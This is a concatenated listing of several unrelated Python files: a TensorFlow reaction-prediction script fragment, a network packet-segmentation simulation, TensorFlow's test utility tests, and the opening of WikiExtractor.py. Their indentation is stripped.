tf.global_variables_initializer().run(session=session)
queue = Queue()
def read_data(coord):
data = []
data_f = open(opts.test_path, 'r')
cand_f = open(opts.cand_path, 'r')
for line in data_f:
items = line.split()
cand = cand_f.readline()
r = items[0]
edits = items[2]
gbonds = []
delbond = edits.split(';')[2]
newbond = edits.split(';')[3]
if len(delbond) > 0:
for s in delbond.split(','):
x,y,_ = s.split('-')
x,y = int(x)-1,int(y)-1
x,y = min(x,y),max(x,y)
gbonds.append((x,y,0))
if len(newbond) > 0:
for s in newbond.split(','):
x,y,t = s.split('-')
if float(t) == 1.5: t = 4
else: t = int(float(t))
x,y = int(x)-1,int(y)-1
x,y = min(x,y),max(x,y)
gbonds.append((x,y,t))
rex_core = set([(x,y) for x,y,_ in gbonds])
cand_bonds = list(rex_core)
for b in cand.strip("\r\n ").split():
x,y = b.split('-')
x,y = int(x)-1,int(y)-1
if (x,y) not in rex_core:
cand_bonds.append((x,y))
data.append((r,cand_bonds,gbonds))
data_len = len(data)
for it in xrange(data_len):
r,cand_bonds,gold_bonds = data[it]
r = r.split('>')[0]
ncore = core_size
while True:
src_tuple,conf = smiles2graph(r, cand_bonds[:ncore], gold_bonds, cutoff=-1)
if len(conf) <= MAX_NCAND:
break
ncore -= 1
queue.put((r,conf))
feed_map = {x:y for x,y in zip(_src_holder, src_tuple)}
session.run(enqueue, feed_dict=feed_map)
coord = tf.train.Coordinator()
t = threading.Thread(target=read_data, args=(coord,))
t.start()
saver = tf.train.Saver()
saver.restore(session, tf.train.latest_checkpoint(opts.model_path))
total = 0
idxfunc = lambda x:x.GetIntProp('molAtomMapNumber')
try:
while not coord.should_stop():
total += 1
r,conf = queue.get()
cur_pred = session.run(pred_topk)
rmol = Chem.MolFromSmiles(r)
rbonds = {}
for bond in rmol.GetBonds():
a1 = idxfunc(bond.GetBeginAtom())
a2 = idxfunc(bond.GetEndAtom())
t = bond_types.index(bond.GetBondType()) + 1
a1,a2 = min(a1,a2),max(a1,a2)
rbonds[(a1,a2)] = t
for idx in cur_pred:
for x,y,t in conf[idx]:
x,y = x+1,y+1
if ((x,y) not in rbonds and t > 0) or ((x,y) in rbonds and rbonds[(x,y)] != t):
print '%d-%d-%d' % (x,y,t),
print '|',
print
if total % 1000 == 0:
sys.stdout.flush()
except Exception as e:
print e
coord.request_stop(e)
finally:
coord.request_stop()
coord.join([t])
|
simulation_2.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network_2
import link_2
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 # 0 means unlimited
simulation_time = 4 # give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] # keeps track of objects, so we can kill their threads
# create network nodes
client = network_2.Host(1)
object_L.append(client)
server = network_2.Host(2)
object_L.append(server)
router_a = network_2.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
# create a Link Layer to keep track of links between network nodes
link_layer = link_2.LinkLayer()
object_L.append(link_layer)
# add all the links
# link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
# out interface of client, in interface of server
# 50 is the MTU - largest size of packet that can be transferred over links
link_layer.add_link(link_2.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link_2.Link(router_a, 0, server, 0, 30))
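# Illustrative sketch (added for clarity; not part of the original assignment
# code): splitting a long message into MTU-sized chunks, the kind of
# segmentation the network layer has to perform when a packet exceeds the
# 30- or 50-byte MTUs configured on the links above.
def _chunk_message(message, mtu):
    return [message[i:i + mtu] for i in range(0, len(message), mtu)]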
# start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
# create some send events
#message = 'THIS IS DATA MESSAGE 0, THIS MESSAGE IS AT LEAST 80 CHARACTERS LONG AND NEEDS TO BE SPLIT'
#client.udt_send(2, message)
for i in range(3):
message = 'this is data message %d, this message is at least 80 characters long that needs to be split' % i
client.udt_send(2, message, i)
'''
if len(message) > 50:
message_1 = message[0:45]
client.udt_send(2, message_1)
message_2 = message[45:100]
client.udt_send(2, message_2)
else:
client.udt_send(2, message)
'''
# give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
# join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
test_util_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import random
import threading
import weakref
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops # pylint: disable=unused-import
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase):
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
def test_session_functions(self):
with self.test_session() as sess:
sess_ref = weakref.ref(sess)
with self.cached_session(graph=None, config=None) as sess2:
# We make sure that sess2 is sess.
assert sess2 is sess
# We make sure we raise an exception if we use cached_session with
# different values.
with self.assertRaises(ValueError):
with self.cached_session(graph=ops.Graph()) as sess2:
pass
with self.assertRaises(ValueError):
with self.cached_session(force_gpu=True) as sess2:
pass
# We make sure that test_session will cache the session even after the
# with scope.
assert not sess_ref()._closed
with self.session() as unique_sess:
unique_sess_ref = weakref.ref(unique_sess)
with self.session() as sess2:
assert sess2 is not unique_sess
# We make sure the session is closed when we leave the with statement.
assert unique_sess_ref()._closed
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node '{{node seven}}"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testIsBuiltWithROCm(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsBuiltWithROCm():
print("Tensorflow build has ROCm support")
else:
print("Tensorflow build does not have ROCm support")
def testIsMklEnabled(self):
# This test doesn't assert anything.
# It ensures the py wrapper function is generated correctly.
if test_util.IsMklEnabled():
print("MKL is enabled")
else:
print("MKL is disabled")
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
@test_util.run_in_graph_and_eager_modes
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
with ops.Graph().as_default():
node_def = ops._NodeDef("IntOutput", "name")
node_def_orig = ops._NodeDef("IntOutput", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(),
original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
@test_util.run_in_graph_and_eager_modes
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
@test_util.run_in_graph_and_eager_modes
def testAllCloseTensors(self):
a_raw_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a = constant_op.constant(a_raw_data)
b = math_ops.add(1, constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8]]))
self.assertAllClose(a, b)
self.assertAllClose(a, a_raw_data)
a_dict = {"key": a}
b_dict = {"key": b}
self.assertAllClose(a_dict, b_dict)
x_list = [a, b]
y_list = [a_raw_data, b]
self.assertAllClose(x_list, y_list)
@test_util.run_in_graph_and_eager_modes
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
@test_util.run_in_graph_and_eager_modes
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNamedtuples(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
my_named_tuple = collections.namedtuple("MyNamedTuple", ["a", "b", "c"])
# Identity.
self.assertAllClose(expected, my_named_tuple(a=a, b=b, c=c))
self.assertAllClose(
my_named_tuple(a=a, b=b, c=c), my_named_tuple(a=a, b=b, c=c))
@test_util.run_in_graph_and_eager_modes
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegexp(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegexp(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
@test_util.run_in_graph_and_eager_modes
def testAllCloseListOfNamedtuples(self):
my_named_tuple = collections.namedtuple("MyNamedTuple", ["x", "y"])
l1 = [
my_named_tuple(x=np.array([[2.3, 2.5]]), y=np.array([[0.97, 0.96]])),
my_named_tuple(x=np.array([[3.3, 3.5]]), y=np.array([[0.98, 0.99]]))
]
l2 = [
([[2.3, 2.5]], [[0.97, 0.96]]),
([[3.3, 3.5]], [[0.98, 0.99]]),
]
self.assertAllClose(l1, l2)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNestedStructure(self):
a = {"x": np.ones((3, 2, 4)) * 7, "y": (2, [{"nested": {"m": 3, "n": 4}}])}
self.assertAllClose(a, a)
b = copy.deepcopy(a)
self.assertAllClose(a, b)
# Test mismatched values
b["y"][1][0]["nested"]["n"] = 4.2
with self.assertRaisesRegexp(AssertionError,
r"\[y\]\[1\]\[0\]\[nested\]\[n\]"):
self.assertAllClose(a, b)
@test_util.run_in_graph_and_eager_modes
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
@test_util.run_in_graph_and_eager_modes
def testAssertAllCloseAccordingToType(self):
# test plain int
self.assertAllCloseAccordingToType(1, 1, rtol=1e-8, atol=1e-8)
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-8], dtype=dtypes.float64),
constant_op.constant([2e-8], dtype=dtypes.float64),
rtol=1e-8,
atol=1e-8)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-7], dtype=dtypes.float32),
constant_op.constant([2e-7], dtype=dtypes.float32),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-4], dtype=dtypes.float16),
constant_op.constant([2e-4], dtype=dtypes.float16),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7,
half_rtol=1e-4,
half_atol=1e-4)
with (self.assertRaises(AssertionError)):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
@test_util.run_in_graph_and_eager_modes
def testAssertAllEqual(self):
i = variables.Variable([100] * 3, dtype=dtypes.int32, name="i")
j = constant_op.constant([20] * 3, dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual([120] * 3, k)
self.assertAllEqual([20] * 3, j)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllClose(self):
# Test with arrays
self.assertNotAllClose([0.1], [0.2])
with self.assertRaises(AssertionError):
self.assertNotAllClose([-1.0, 2.0], [-1.0, 2.0])
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
self.assertNotAllClose([0.9, 1.0], x)
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.0, 1.0], x)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseRTol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], rtol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, rtol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseATol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], atol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, atol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLess(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllClose([110.0, 120.0, 130.0], z)
self.assertAllGreater(x, 95.0)
self.assertAllLess(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 95.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLessEqual(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllEqual([110.0, 120.0, 130.0], z)
self.assertAllGreaterEqual(x, 95.0)
self.assertAllLessEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 95.0)
def testAssertAllInRangeWithNonNumericValuesFails(self):
s1 = constant_op.constant("Hello, ", name="s1")
c = constant_op.constant([1 + 2j, -3 + 5j], name="c")
b = constant_op.constant([False, True], name="b")
with self.assertRaises(AssertionError):
self.assertAllInRange(s1, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(c, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(b, 0, 1)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRange(self):
x = constant_op.constant([10.0, 15.0], name="x")
self.assertAllInRange(x, 10, 15)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_lower_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_upper_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(
x, 10, 15, open_lower_bound=True, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeErrorMessageEllipses(self):
x_init = np.array([[10.0, 15.0]] * 12)
x = constant_op.constant(x_init, name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 5, 10)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeDetectsNaNs(self):
x = constant_op.constant(
[[np.nan, 0.0], [np.nan, np.inf], [np.inf, np.nan]], name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 0.0, 2.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeWithInfinities(self):
x = constant_op.constant([10.0, np.inf], name="x")
self.assertAllInRange(x, 10, np.inf)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, np.inf, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInSet(self):
b = constant_op.constant([True, False], name="b")
x = constant_op.constant([13, 37], name="x")
self.assertAllInSet(b, [False, True])
self.assertAllInSet(b, (False, True))
self.assertAllInSet(b, {False, True})
self.assertAllInSet(x, [0, 13, 37, 42])
self.assertAllInSet(x, (0, 13, 37, 42))
self.assertAllInSet(x, {0, 13, 37, 42})
with self.assertRaises(AssertionError):
self.assertAllInSet(b, [False])
with self.assertRaises(AssertionError):
self.assertAllInSet(x, (42,))
def testRandomSeed(self):
# Call setUp again for WithCApi case (since it makes a new default graph
# after setup).
# TODO(skyewm): remove this when C API is permanently enabled.
self.setUp()
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
@test_util.run_in_graph_and_eager_modes
def test_callable_evaluate(self):
def model():
return resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1) + 1
with context.eager_mode():
self.assertEqual(2, self.evaluate(model))
@test_util.run_in_graph_and_eager_modes
def test_nested_tensors_evaluate(self):
expected = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
nested = {"a": constant_op.constant(1),
"b": constant_op.constant(2),
"nested": {"d": constant_op.constant(3),
"e": constant_op.constant(4)}}
self.assertEqual(expected, self.evaluate(nested))
def test_run_in_graph_and_eager_modes(self):
l = []
def inc(self, with_brackets):
del self # self argument is required by run_in_graph_and_eager_modes.
mode = "eager" if context.executing_eagerly() else "graph"
with_brackets = "with_brackets" if with_brackets else "without_brackets"
l.append((with_brackets, mode))
f = test_util.run_in_graph_and_eager_modes(inc)
f(self, with_brackets=False)
f = test_util.run_in_graph_and_eager_modes()(inc)
f(self, with_brackets=True)
self.assertEqual(len(l), 4)
self.assertEqual(set(l), {
("with_brackets", "graph"),
("with_brackets", "eager"),
("without_brackets", "graph"),
("without_brackets", "eager"),
})
def test_get_node_def_from_graph(self):
graph_def = graph_pb2.GraphDef()
node_foo = graph_def.node.add()
node_foo.name = "foo"
self.assertIs(test_util.get_node_def_from_graph("foo", graph_def), node_foo)
self.assertIsNone(test_util.get_node_def_from_graph("bar", graph_def))
def test_run_in_eager_and_graph_modes_test_class(self):
msg = "`run_test_in_graph_and_eager_modes` only supports test methods.*"
with self.assertRaisesRegexp(ValueError, msg):
@test_util.run_in_graph_and_eager_modes()
class Foo(object):
pass
del Foo # Make pylint unused happy.
def test_run_in_eager_and_graph_modes_skip_graph_runs_eager(self):
modes = []
def _test(self):
if not context.executing_eagerly():
self.skipTest("Skipping in graph mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["eager"])
def test_run_in_eager_and_graph_modes_skip_eager_runs_graph(self):
modes = []
def _test(self):
if context.executing_eagerly():
self.skipTest("Skipping in eager mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["graph"])
def test_run_in_graph_and_eager_modes_setup_in_same_mode(self):
modes = []
mode_name = lambda: "eager" if context.executing_eagerly() else "graph"
class ExampleTest(test_util.TensorFlowTestCase):
def runTest(self):
pass
def setUp(self):
modes.append("setup_" + mode_name())
@test_util.run_in_graph_and_eager_modes
def testBody(self):
modes.append("run_" + mode_name())
e = ExampleTest()
e.setUp()
e.testBody()
self.assertEqual(modes[0:2], ["setup_graph", "run_graph"])
self.assertEqual(modes[2:], ["setup_eager", "run_eager"])
# Its own test case to reproduce variable sharing issues which only pop up when
# setUp() is overridden and super() is not called.
class GraphAndEagerNoVariableSharing(test_util.TensorFlowTestCase):
def setUp(self):
pass # Intentionally does not call TensorFlowTestCase's super()
@test_util.run_in_graph_and_eager_modes
def test_no_variable_sharing(self):
variable_scope.get_variable(
name="step_size",
initializer=np.array(1e-5, np.float32),
use_resource=True,
trainable=False)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
def test_no_reference_cycle_decorator(self):
class ReferenceCycleTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_garbage_created
def test_has_cycle(self):
a = []
a.append(a)
@test_util.assert_no_garbage_created
def test_has_no_cycle(self):
pass
with self.assertRaises(AssertionError):
ReferenceCycleTest().test_has_cycle()
ReferenceCycleTest().test_has_no_cycle()
@test_util.run_in_graph_and_eager_modes
def test_no_leaked_tensor_decorator(self):
class LeakedTensorTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_new_tensors
def test_has_leak(self):
self.a = constant_op.constant([3.], name="leak")
@test_util.assert_no_new_tensors
def test_has_no_leak(self):
constant_op.constant([3.], name="no-leak")
with self.assertRaisesRegexp(AssertionError, "Tensors not deallocated"):
LeakedTensorTest().test_has_leak()
LeakedTensorTest().test_has_no_leak()
def test_no_new_objects_decorator(self):
class LeakedObjectTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
inner_self.accumulation = []
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_leak(self):
self.accumulation.append([1.])
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_no_leak(self):
self.not_accumulating = [1.]
with self.assertRaises(AssertionError):
LeakedObjectTest().test_has_leak()
LeakedObjectTest().test_has_no_leak()
if __name__ == "__main__":
googletest.main()
|
WikiExtractor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# Version: 3.0 (July 22, 2020)
# Author: Giuseppe Attardi (attardi@di.unipi.it), University of Pisa
#
# Contributors:
# Antonio Fuschetto (fuschett@aol.com)
# Leonardo Souza (lsouza@amtera.com.br)
# Juan Manuel Caicedo (juan@cavorite.com)
# Humberto Pereira (begini@gmail.com)
# Siegfried-A. Gevatter (siegfried@gevatter.com)
# Pedro Assis (pedroh2306@gmail.com)
# Wim Muskee (wimmuskee@gmail.com)
# Radics Geza (radicsge@gmail.com)
# Nick Ulven (nulven@github)
#
# =============================================================================
# Copyright (c) 2009-2020. Giuseppe Attardi (attardi@di.unipi.it).
# =============================================================================
# This file is part of Tanl.
#
# Tanl is free software; you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# Tanl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
"""Wikipedia Extractor:
Extracts and cleans text from a Wikipedia database dump and stores output in a
number of files of similar size in a given directory.
Each file will contain several documents in the format:
<doc id="" url="" title="">
...
</doc>
If the program is invoked with the --json flag, then each file will
contain several documents formatted as json objects, one per line, with
the following structure
{"id": "", "revid": "", "url": "", "title": "", "text": "..."}
The program performs template expansion by preprocessing the whole dump and
collecting template definitions.
"""
import argparse
import bz2
import logging
import os.path
import re # TODO use regex when it will be standard
import sys
from io import StringIO
from multiprocessing import Queue, Process, cpu_count
from timeit import default_timer
from pathlib import Path
sys.path.append('workspace/wikiextractor')
